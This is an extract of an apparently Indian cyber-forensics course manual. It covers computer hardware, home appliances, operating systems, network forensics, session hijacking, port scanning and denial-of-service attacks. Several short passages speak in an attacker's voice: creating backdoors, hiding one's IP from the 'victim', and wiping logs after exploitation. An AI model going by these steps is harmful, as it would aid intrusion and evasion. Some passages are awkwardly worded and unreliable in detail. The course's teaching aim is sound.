Various Performance The computer performs basically five major operations of functions irrespective of their size and make. They are it accepts data or instruction by way of input, it stores data, it can process data as required by the user, it gives results in the form of output, and it controls all operations inside a computer.
Computer languages The computer languages are Low Level Language High Level Language
Peripheral devices The peripheral devices are given below.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/2.html Page 45 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
Input Devices Output Devices
Input Devices The followings are input devices. Keyboard Mouse Optical/magnetic Scanner Touch Screen Microphone for voice as input
Output Devices The out put devices are given below Monitor (Visual Display Unit) Printer Speakers
Power Supplies D.C. to D.C. converters and D.C. to A.C. Converters belong to the category of Switched Mode Power Supplies (SMPS).
SMPS Types D.C. to D.C. Converter Forward Converter Fly back Converter SelfOscillating Fly back Converter
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/2.html Page 46 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
Hard disk drive
A hard disk drive (HDD) is a data storage device. It is used rapidly for rotating disks (platters). The rotating disks are coated with magnetic material. Application: It is used for storing and retrieving digital information.
Use of HDD An HDD retains its data even when powered off. Data is read in a randomaccess manner, It means individual blocks of data can be stored or retrieved in any order rather than sequentially.
Parts of HDD An HDD consists of one or more rigid ("hard") rapidly rotating disks (platters). They are supported with magnetic heads. They are arranged on a moving actuator arm. It reads and writes data to the surfaces.
History of HDD The HDD is introduced by IBM in 1956. HDDs became the dominant secondary storage device. It was used as general purpose computer by the early 1960s.
New HDD technologies Heatassisted magnetic recording. Bitpatterned recording. Shingled magnetic recording.
Hard Drive components The followings are hard drive components head actuator read/write actuator arm
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/3.html Page 47 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
read/write head Spindle, platter Disk controller
Hard drive types There are two types of hard drives. They are External hard drives Internal hard drives
HDD replaced by SSD Solid State Drives (SSDs) are starting to replace (HDDs) in many computers. Because of advantages, these drives have over HDD. The SSD is becoming more and more popular. HDD will continue to be in desktop computers with SSD because of the available capacity HDD offers over SSD.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/3.html Page 48 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
Laptop
A laptop is a portable with a calm shell form factor. It is suitable for mobile use. They are also some times called notebook computers or notebooks.
Uses of laptop Laptops are commonly used in a variety of settings. They include work, education, and personal multimedia.
Components of laptop A laptop combines the components and inputs as a desktop computer; It includes display, speakers and keyboard. It also has pointing device (such as a touchpad), into a single device.
History of Laptop A "personal, portable information manipulator" was imagined by Alan Kay. It happened at Xerox PARC in 1968. The he described in his 1972 paper as the "Daybook".
Categories 3D Built a class room Gaming Built a class business
Major brands Acer Dell Lenovo
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/4.html Page 49 of 135
1/1
Hardware: Model System Platforms 8/17/2015
scorm content
Tablet computer
A tablet computer or simply tablet is a mobile computer with display, circuitry and battery in a single unit. Tablets contains: Tablets are equipped with sensors. It includes cameras and microphone. The accelerometer and touch screen, with finger or stylus gestures ar part of tablet. Besides these, the computer mouse and keyboard are also attached.
Touch interface A key component among tablet computers are touch input. This allows the user to navigate. It makes the job easier and type with a virtual keyboard.
Touch screen types The touch screen types are given below. Resistive touchscreens Capacitive touchscreens
What is Resistive touch screen? Resistive touch screens are passive. It responds to pressure on the screen. They allow a high level of precision. It is useful in emulating a pointer. But it may require calibration. Because of the high resolution, a stylus or fingernail is often used.
What is Capacitive touch screens? Capacitive touch screens tend to be less accurate. But it is more responsive than resistive devices. Because they require a conductive material, such as a fingertip.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/5.html Page 50 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
It is for facilitating input. They are not common among stylusoriented devices, but are prominent on consumer devices.
Features The followings are touching screen features. Hardware Highdefinition, Antiglare display. GPS satellite location. Wireless internet connectivity. (usually with WiFi standard and optional mobile broadband).
Data storage Onboard flash memory. Ports for removable storage. Cloud storage options for backup and syncing data across devices.
Additional inputs Speech recognition Gesture recognition
Types of Operating system Android Blackberry OS IOS Linux Windows
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/5.html Page 51 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
Server A server is system software. It is suitable computer hardware. It responds to requests across a computer network. This set up will provide a network service.
Typical computing servers Typical computing servers are database server. It includes file server, mail server and print server. It also has web server, gaming server, and application server.
Server operating systems GUI not available or optional ability to reconfigure. It can update both hardware and software. Advanced backup facilities are permitting regular and frequent online backups of critical data. It also permits flexible and advanced networking &automation capabilities. They are such as tight system security with advanced user, resource, data, and memory protection. Example: UNIX and services in Windows.
Types of servers Application server: A server dedicated to running certain software applications. Catalog server: A central search point for information across a distributed network. Communications server: This server is carriergrade computing platform. It helps for communications networks. Computer server: A server intended for intensive computations especially scientific. Database server: It provides database services to other computer programs or computers. Fax server: It provides fax services for clients. File server: It provides remote access to files. Game server: A server that video game clients connect to play online together. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/6.html Page 52 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
Energy consumption In 2010, data centers consume lot s of energy. (servers, cooling, and other electrical infrastructure). It was responsible for 1.11.5% of electrical energy consumption worldwide. It stood upto 1.72.2% in the United States.
Size classes Rack server Tower server Miniature (home) servers Mini rack servers blade server Mobile Server UltraDense Server Super servers
Server hacking Learn a programming language Know your target Test the target Crack the password or authentication process Create a backdoor
Server virtualization Server virtualization is the masking of server resources. It includes the number and identity of individual physical servers. It also has number and identity of processors, and operating systems, from server users.
Virtual private servers The server administrator uses a software application. It helps to divide one physical server into multiple isolated virtual environments. But they are also known as guests, instances, containers or emulations. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/6.html Page 53 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
iPods
The iPods use the Apple iTunes software to transfer music to the music devices. Using iTunes you can store music library. You can burn music from CD. You can also transfer photos, videos, game and small applications (when supported by the player) and many other features.
Invention The first line was released on October 23, 2001. It was about 8½ months after iTunes (Macintosh version) released.
Current versions Ultracompact iPod Shuffle Compact iPod Nano The touch screen iPod Touch, and The hard drivebased iPod Classic
Uses IPods can serve as external data storage devices. Storage capacity varies by model. It ranges from 2 GB for the iPod Shuffle to 160 GB for the iPod Classic. Accessories: Some accessories add extra features that other music players. Examples: sound recorders, FM radio tuners, wired remote controls, and audio/visual cables for TV connections.
Software The iPod line can play several audio file formats. It includes MP3, AAC/M4A, Protected AAC, AIFF, WAV, Audible audio book, and Apple Lossless.
Buttons The buttons perform basic functions. They are such as menu, play, pause, next track, and previous track.
Reliability and durability file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/7.html Page 54 of 135
1/2
Hardware: Model System Platforms 8/17/2015
scorm content
A 2005 survey conducted on the MacInTouch website. It found that the iPod line had an average failure rate of 13.7%. The true iPod failure rate may be lower than it appears.
What is an MP3 Player? An MP3 player is a type of digital audio player. It falls under the broader category of PMP devices. It is a small — often weighing less than an ounce. It is handheld device that use flash memory for storing MP3 files.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/7.html Page 55 of 135
2/2
Hardware: Model System Platforms 8/17/2015
scorm content
PDA
A personal digital assistant (PDA), also known as a palmtop computer, or personal data assistant. It is a mobile device that functions as a personal information manager. PDAs are largely considered obsolete with the widespread adoption of smart phones.
First PDA The first PDA was released in 1984 by Psion, the Organizer. Followed by Psion′s Series 3, in 1991, which began to resemble the more familiar PDA style. It also had a full keyboard.
Features The features are listed below. Touch screen Memory cards Wired connectivity Wireless connectivity
Touch screen in PDA Virtual keyboard Handwriting recognition
Memory Cards in PDA PDAs use micro SD cards. It is electronically compatible with SD cards. But it has a much smaller physical size.
New versions of PDAs Some early PDAs were able to connect to the Internet indirectly. It happens through an external modem connected via the PDA′s serial port. Sometimes it has got connected as "sync". It is performed by connector or directly by using an expansion card that provided an Ethernet port. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/8.html Page 56 of 135
1/3
Hardware: Model System Platforms 8/17/2015
scorm content
Wireless connectivity Many modern PDAs have WiFi wireless network connectivity. It can connect to WiFi hotspots as well.
Operating systems The operating systems of wireless connectivity are Palm OS Android IOS Webhost
Palm OS Palm OS is also known as Garnet OS. It is a mobile operating system. It was initially developed by Palm, Inc., It was meant for personal digital assistants (PDAs) in 1996.
Design Palm OS is designed for ease of use. It is bestowed with a touch screenbased graphical user interface.
Android Android is an operating system. It is based on the Linux kernel. It is designed primarily for touch screen mobile devices. They are such as smart phones and tablet computers.
Android features The android features are listed below. Messaging Web browser Voice based features file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/8.html Page 57 of 135
2/3
Hardware: Model System Platforms 8/17/2015
scorm content
Multitouch Screen capture
Additional features There are some more additional features listed below. Video calling Multiple language Support Accessibility
Connectivity The connectivity feature has following features. Connectivity Bluetooth Tethering
Media Streaming media support Media support External storage
Others Java support Handset layouts
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/8.html Page 58 of 135
3/3
Hardware: Model System Platforms 8/17/2015
scorm content
Digital Appliances
Washing machine A washing machine is a machine. It helps to wash laundry. The cloths and and sheets are washed by washing machine. Example: laundry machine, clothes washer, or washer
Washing Machine Parts The washing machine has following parts. Water inlet control valve Water pump Tub Agitator or rotating disc Motor of the washing machine Timer Printed circuit board (PCB) Drain pipe
Water inlet There is water inlet control valve near the water inlet point of the washing machine. When you load the clothes in washing machine, this valve gets opened and closes automatically. Depending on the total quantity of the water required the valve operates on its own.
Water pump The water pump circulates water through the washing machine. It works in two directions. It recirculates the water during wash cycle. It drains the water during the spin cycle.
Tub Two types of tubs are in the washing machine: inner and outer. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 59 of 135
1/5
Hardware: Model System Platforms 8/17/2015
scorm content
The clothes are loaded in the inner tub, where the clothes are washed, rinsed and dried. The inner tub has small holes for draining the water. The external tub covers the inner tub. It supports various cycles of clothes washing.
Agitator The agitator is located inside the tub of the washing machine. It is the important part of the washing machine. It actually performs the cleaning operation of the clothes.
Motor The motor is coupled to the agitator or the disc. It produces rotator motion. These are multi speed motors. Its speed can be changed as per the requirement. In fully automatic washing machine the agitator changes automatically as per the load.
Timer The timer helps setting the wash time for the clothes manually. In the automatic mode the time is set automatically. It gets set depends upon the number of clothes inside the washing machine.
PCB The PCB comprises of the various electronic components and circuits. They are sort of artificial intelligence devices. They sense various external conditions and take the decisions accordingly. These are also called as fuzzy logic systems. Thus the PCB will calculate the total weight of the clothes. The PCB also determines quantity of water and detergent required and total time required for washing.
Drain pipe The drain pipe enables removing the dirty water. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 60 of 135
2/5
Hardware: Model System Platforms 8/17/2015
scorm content
Dirty water comes from the washing which was used for the washing purpose. Application: Removing the dirty water from washing.
Types There are two types of washing machines. They are Top loading washing machine Front loading washing machine
Top loading In this machine, the clothes are loaded from the top of the washing machine. There is a cover at the top that helps loading and unloading of clothes. The top loading washing machine is preferred by the people. This is more widely used than the front loading.
Front loading In this machine, the clothes are loaded from the front side. The front loading washing machines consume less electric energy, water and detergent. It also gives better washing results compared to the top loading washing machine. Benefits: Consume less electric energy. Top loading machines classification: They are Semiautomatic Fully automatic
Semiautomatic washing machine It has separate tubs or vessels for the washer and the drier. There are two separate timers. They enable setting washing and drying times. Put sufficient quantity of the water and detergent and then set the timer.
Fully automatic machine In fully automatic washing machine there is only one tub. It serves as the washer.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 61 of 135
3/5
Hardware: Model System Platforms 8/17/2015
scorm content
Depending on the number of clothes or the weight of the clothes, the machine takes sufficient amount of water. It also takes detergent automatically. It also sets the timer for wash and drying automatically. It does the rest of things automatically. Benefits: It does the rest of things automatically.
Manufacturers The top washing machine manufacturers are LG Samsung Videocon Whirlpool
Microwave oven A microwave oven, often colloquially shortened to microwave is a kitchen appliance. It heats food by bombarding it with electromagnetic radiation. It occurs in the microwave spectrum. It causes polarized molecules in the food. Then it rotates and builds up thermal energy. Application: Heats food
Uses Microwave ovens are used for reheating previously cooked foods. It also cooks vegetables. They are also useful for rapid heating. Sometimes it helps to cook slowly prepared cooking items. Application: Reheating cooked foods and cooking vegetables. Example: Hot butter, fats, and chocolate.
Principle of microwave oven A microwave oven heats food by passing microwave radiation. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 62 of 135
4/5
Hardware: Model System Platforms 8/17/2015
scorm content
It happens through it. Microwaves are a form of nonionizing electromagnetic radiation. It is with a higher frequency than ordinary radio waves but lower than infrared light.
Heating efficiency A microwave oven converts only part of its electrical input into microwave energy. An average consumer microwave oven consumes 1100 W of electricity. It produces 700 W of microwave power, an efficiency of 64%
Design A Transformer or an electronic power converter passes energy to the magnetron. It is a high voltage capacitor connected to the magnetron transformer. It is connected through a diode to the chassis. A cavity magnetron, which converts highvoltage electric energy to microwave radiation.
Benefits and safety Commercial microwave ovens all use a timer. It is set in their standard operating mode. When the timer runs out, the oven turns itself off.
Top manufacturers The top manufacturers of microwave oven are Panasonic Croma Samsung
Advantages They are many advantages of using micro oven. Particularly it helps in following ways. less oil Baking can done only by oven
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit4/assets/9.html Page 63 of 135
5/5
UNIT - 5 Software: Operating Systems, Network Traffic and Applications
Page 64 of 135
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Operating system
Operating system (OS) is a collection of software. It manages computer hardware resources. It provides common services for computer programs. Timesharing operating systems schedule tasks for efficient use of the system. It may also include accounting software for cost allocation of processor time. It also includes mass storage, printing, and other resources.
Types of OS There are different types of operating systems. Realtime Multiuser Multitasking Distributed Templated Embedded
Realtime OS A realtime operating system is a multitasking operating system. It aims at executing realtime applications.
MultiuserOS A multiuser operating system allows multiple users. It helps to access a computer system at the same time.
Multitasking OS A multitasking operating system allows more than one program. It is to run at the same time, from the point of view of human time scales.
Distributed OS A distributed operating system manages a group of independent computers. It makes them appear to be a single computer. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/2.html Page 65 of 135
1/2
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Templated OS Templating refers to create a single virtual machine image. It occurs in an o/s, distributed and cloud computing context. It is as similar as a guest operating system.
Embedded OS Embedded operating systems are designed for a purpose. It is used in embedded computer systems.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/2.html Page 66 of 135
2/2
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Network traffic
Net working traffic controls the managing process. It also prioritize the jobs. It controls or reduces the network traffic. Particularly Internet bandwidth is reduced with the help of network traffic.
Uses In order to use these tools effectively, it is necessary to measure the network traffic. It will determine the causes of network congestion. Then it attacks those problems specifically.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/3.html Page 67 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
BIOS
The fundamental purposes of the BIOS are to initialize and test the system hardware components. It helps to load a boot loader or an operating system. It occurs from a mass memory device. The BIOS of the original IBM PC/XT had no interactive user interface. Error messages were displayed on the screen. It is also coded in series of sounds. The sounds were generated to signal errors.
BIOS software BIOS software is stored on a nonvolatile ROM chip on the motherboard. It is specifically designed to work with each particular model of computer. It occurs by interfacing with various devices. Eventually the devices make up the complementary chipset of the system.
Boot devices The BIOS selects candidate boot devices. It happens by using information collected by POST and configuration information. The information is collected from EEPROM,CMOS RAM or, in the earliest PCs, DIP switches. Option ROMs may also influence or supplant the boot process. Here the boost process is defined by the motherboard BIOS ROM.
Boot environment The CPU is in real mode and the generalpurpose and segment registers are undefined. The memory below address 0x000500. It contains the interrupt vector table. The 256byte BIOS data area, but the boot program must set up its own stack (or at least MS DOS 6 acts like it must).
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/4.html Page 68 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Network Forensic Analysis
Network Forensic analysis takes traditional protocol analysis. It is performed to the next level by extending the duration. Here, the analyzer can capture packets. These packets have the latest capture, storage and analysis technology.
Applications The main application of network forensic analysis is optimizing network and application performance. Data Center Consolidation – Here network forensic analysis capture unexpected traffic pattern. Then it isolates problems caused during deployment of virtualization. Unified Communication Deployment – It evaluates stability and quality of deployment. It happens during pilot and the first few weeks of operation before contractor warranty ends.
Analysis tool The mission of this network forensic analysis tool is to store information. Then it will analyze the potential information.
Tool selection Performance Visibility Capacity Redundancy Ease of use Depth of Analysis
Performance What is the throughput to disk (not to memory) with no packet loss?
Visibility The following details need to be kept in mind while selecting analysis tool. How many links can one recorder connect to and
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/5.html Page 69 of 135
1/2
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
What kind of topology can it link to? How much will turn on realtime monitoring or data analysis and affect the throughput?
Capacity The details of capacity should be kept in mind by considering following questions. Is the storage specified based on raw storage? Is the real data storage available? Is there a way to filter? Is slice traffic so that only relevant data is stored?
Redundancy Is RAID 5 or 10 used? If not, what happens when the hard disk fails? Will data be lost? How much work does it take to recover the system and/or the data?
Ease of use How difficult is it to analyze the network data captured? Can data collected from different parts of the network be easily aggregated? Can it be segmented and analyzed to get to the root cause?
Depth of Analysis The following factors need to discuss while Dept of analysis occurs. How many applications would the tool be able to decode and support? What about Video and Voice analysis? How is the analysis performance of the solution? Is there an easy way to analyze traffic across the network?
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/5.html Page 70 of 135
2/2
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Collecting Data
While collecting data the following matters need to be kept in mind. Relations Level of analysis Sources
Examining Data The most effective place to begin a computer forensic investigation is to consult first. The consultation should be done with the client. The consultation is to create a strategy for collecting, analyzing and processing the data.
Data Preservation Electronic evidence, just like other types of evidence is fragile. Entering data and loading software, performs routine system maintenance. It is simply booting a computer which can destroy certain files.
Data Collection Computer forensic experts can retrieve data from virtually all storage. They can also collect data from an operating systems. It includes many antiquated systems. Retrieval of data from seemingly inaccessible media also can be done. Accessing active data on media. Recovering deleted data and/or deleted email.
Data Recovery The data recovery process is an important portion of the forensic analysis.
Testimony and Reporting Once the data analysis is complete, computer forensic engineers can help support the client′s court case. It is done by customizing reports about the data collected and produced. This will support the case Providing data.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/6.html Page 71 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Examining one data source in detail
On the Insight toolbar, click the Admin icon. The Data sources list opens. Any potential problems are marked with an exclamation mark in the list. The most serious problems are at the top of the list.
Examining data Select the data source that is causing concern. Click the data source name link.
Examining data source On the data source summary page, check the information in any of these sections provided for your data source. Event timeline lists events tied to the current status shown in the Data sources list. Events in this summary are displayed per device. Errors are shown in red. Position your mouse pointer on timeline items to display additional information. Devices reported by this data source lists the types of devices, their IP addresses, and links to more detailed information for each device.
After Examining data source Edit the description of the data source to correct the problem. Poll again forces polling to reveal if the problem was persistent or intermittent. Postpone data source polling for 1, 3, or 5 and stop the warning messages. Install a patch on the data source to correct the problem. Prepares an error reports to NetApp Customer Support.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/7.html Page 72 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Data source
A data source is one entry in a data set. For example if octet’s data set has two data sources: rx and tx. Each value in a value list corresponds directly to a data source.
Data source information A data source consists of four pieces of information about the corresponding value. Name (for example rx and tx). Type of the data source (counter, gauge, derive or absolute). Minimum value (NaN equals negative infinity). Maximum value (NaN equals positive infinity).
Data source types The followings are data source types. GAUGE DERIVE COUNTER ABSOLUTE GAUGE A GAUGE value is simply stored asis. This is the right choice for values which may increase as well as decrease. They are such as temperatures or the amount of memory used. Absolute This is probably the most exotic type. It is intended for counters which are reset upon reading. In effect, the type is very similar to GAUGE except. The value is an integer and will be divided by the time since the last reading. This data source type is available since version 4.8.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/8.html Page 73 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Attackers identification
There are three main methods used to perpetrate a session hijack. These are Session fixation. Session side jacking and Crosssite scripting.
Session fixation Session fixation, where the attacker sets a user′s session id to one known to him. For example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
Session side jacking In Session side jacking, the attacker uses packet sniffing to read network traffic between two parties. It is done to steal the session cookie. Many web sites use SSL encryption for login pages. This is to prevent attackers from seeing the password.
Crosssite scripting In Crosssite scripting, the attacker tricks the user′s computer into running code. Then it is treated as trustworthy because it appears to belong to the server. So it allows the attacker to obtain a copy of the cookie or perform other operations.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/9.html Page 74 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Email
Electronic mail, most commonly referred to as email or email since ca. 1993. It is a method of exchanging digital messages. It occurs from an author to one or more recipients.
LAN email systems cc:Mail Lantastic WordPerfect Office Microsoft Mail Banyan VINES Lotus Notes
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/10.html Page 75 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Web usage
Internet users are persons using the Internet in the last 12 months from any device. It also includes mobile phones. Penetration is the percentage of a country′s population that are Internet users.
Access subscriptions Fixed broadband access Mobile broadband
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/11.html Page 76 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Hacking Hacking refers to an array of activities.
They are done to intrude someone else’s personal information space. It is done so as to use it for malicious, unwanted purposes. Hacking is a term used to refer to activities aimed at exploiting security flaws. It is to obtain critical information for gaining access to secured networks.
History The followings are some history of hacking. During 1980s Cyberspace coined 414 people arrested Two hacker groups formed 2600 published 1990s National Crackdown on hackers was initiated Kevin Mitnick was arrested Microsoft’s NT operating system was pierced 2001 In one of the biggest denialofservice attack, hackers launched attacks against eBay, Yahoo!, CNN.com., Amazon and others. 2007 Bank hit by “biggest ever” hack. Swedish Bank, Nordea recorded nearly $1 Million has been stolen in three months from 250 customer account.
Famous Hackers The renowned hackers are Ian Murphy Robert Morris file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/12.html Page 77 of 135
1/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Hacker Attitude The world is full of fascinating problems. It is waiting to be solved. Being a hacker is lots of fun, but it′s a kind of fun. It takes lots of effort. The effort takes motivation. To be a hacker you have to get a basic thrill from solving problems. You need to sharpen your skills, and exercising your intelligence. Nobody should ever have to solve a problem twice. Creative brains are a valuable, limited resource. So that it′s almost a moral duty for you to share information. It is to solve problems and then give the solutions. Hackers can solve new problems. instead of perpetually readdress old ones. The followings are hacker attitudes. Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored. They have to drudge at stupid repetitive work. Freedom is good. Hackers are naturally antiauthoritarian. Anyone who can give you orders can stop you. It is from solving whatever problem you′re being fascinated.
Hacking Skills It is the fundamental hacking skill. If you don′t know any computer languages, you can′t do hacking. Get one of the opensource Unix′s and learn to use and run it the single most important step. Any newbie can take towards acquiring hacker skills. It is to get a copy of Linux or one of the BSDUnix’s, file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/12.html Page 78 of 135
2/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Then install it on a personal machine, and run it. Learn how to use the World Wide Web and write HTML. To be worthwhile, your page must have content it must be interesting and/or useful to other hackers.
Hacking Premeasured When you start hacking the first thing you need to do is: To make sure the victim will not find out your real identity. So hide your IP by masking it or using a anonymous proxy server. This is only effective when the victim has no knowledge about computers and internet. Organizations like the F.B.I, C.I.A and such will find you in no time, so beware.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/12.html Page 79 of 135
3/3
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
IP Address
Every system connected to a network has a unique Internet Protocol (IP). Address which acts as its identity on that network. An IP Address is a 32bit address which is divided into four fields of 8bits each. For Example, 203.94.35.12. All data sent or received by a system will be addressed from or to the system.
IP Address finding A remote IP Address can easily be found out by any of the following methods. Through Instant Messaging Software, Through Internet Relay Chat, Through Your website, Through Email Headers.
IP Address finding via website One can easily log the IP Addresses of all visitors to their website by using simply JAVA applets or JavaScript code.
Counter measures One should surf the Internet through a Proxy Server. One can also make use of the numerous Free Anonymous Surfing Proxy Services. For Example, www.anonymizer.com
IP Address finding via email Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email. A Typical excerpt of such a Header of an email sent from a Hotmail account is ReturnPath: [email protected]
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/13.html Page 80 of 135
1/1
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Dangers & Concerns
DOS Attacks Disconnect from the Internet Trojans Exploitation Geographical Information File Sharing Exploits
NETWORK HACKING A typical attacker works in the following manner: Identify the target system. Gathering Information on the target system. Finding a possible loophole in the target system. Exploiting this loophole using exploit code. Removing all traces from the log files and escaping without a trace.
Port Scanning Port Scanning means to scan the target system in order to get a list of open ports (i.e. ports listening for connections) and services running on these open ports. Port Scanning is normally the first step that an attacker undertakes. It is used to get a list of open ports, services and the Operating System running on the target system. It can be performed easily by using different methods. Manual Port Scanning can be performed using the famous ‘Telnet’ program. It is often the first tell tale sign, that gives an attacker away to the system administrator.
TCP Connect Scanning Port Scanner establishes a full 3way TCP\IP Handshake with all ports on the remote system. The regular 3way TCP\IP Handshake has been depicted below: ClientSYN Packet Host HostSYN\ACK Packet Client ClientACK Packet Host file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 81 of 135
1/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
Accurate and Fastest Port Scanning Method.
Security Threats Port Scanning is commonly used by computer attackers to get the following information about the target system: List of Open Ports Services Running Exact Names and Versions of all the Services or Daemons. Operating System name and version.
Major Tools Some of the best and the most commonly used Port Scanners are Nmap, Superscan, Hping. Common Features of all above Port Scanners: Very Easy to Use, Display Detailed Results
CounterAttacks It is impossible to stop clients from Port Scanning. Some useful AntiPort Scanning software available are: Scanlogd (A Unix based Port Scan Detector & Logger), BlackICE (A Windows based Port Scan Detector & Logger), Snort: A packet sniffer cum IDS, Abacus Port sentry: Capable of Detecting both normal and stealth port scanning attempts.
ICMP Scanning The Internet Control Message Protocol (ICMP) is the protocol used for reporting errors that might have occurred while transferring data packets over networks. Extremely Useful in Information Gathering. Originally, designed for network diagnosis and to find out as to what went wrong in the data communication. It can be used to find out the following: Host Detection, Operating System Information, Network Topography Information and Firewall Detection.
Host Detection Techniques ICMP Host Detection technique ‘ping’ command or utility.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 82 of 135
2/5
Software: Operating Systems, Network Traffic and Applications 8/17/2015
scorm content
The ‘ping’ utility can be used to determine whether the remote host is alive or not. The ping command can be used by the attacker for the following purposes: Host Detection Purposes, To clog up valuable network resources by sending infinite ‘Echo request’ ICMP messages.
Ping Host Detection Below is sample output of a PING command executed on a Windows machine:
Types of Attacks There are an endless number of attacks, to protect his system Denial of Services attacks (DOS Attacks). Threat from Sniffing and Key Logging, Trojan Attacks, IP Spoofing, Buffer Overflows.
DOS Attacks DOS Attacks are aimed at denying valid, legitimate Internet and Network users access to the services offered by the target system. In other words, a DOS attack is one in which you clog up so much memory on the target system. It cannot serve legitimate users. There are numerous types of Denial of Services Attacks or DOS Attacks.
Ping of Death Attack The maximum packet size allowed to be transmitted by TCP\IP on a network is 65 536 bytes. In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCP\IP is sent to the target system. As soon as the target system receives a packet exceeding the allowable size. Then it crashes, reboots or hangs. This attack can easily be executed by the ‘ping’ command.
SMURF Attacks In SMURF Attacks, a huge number of Ping Requests are sent to the Target system. It is done using Spoofed IP Addresses from within the target network. Due to infinite loops thus generated and due to the large number of Ping Requests, the target system will crash, restart or hang up.
Sniffers file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit5/assets/14.html Page 83 of 135
3/5
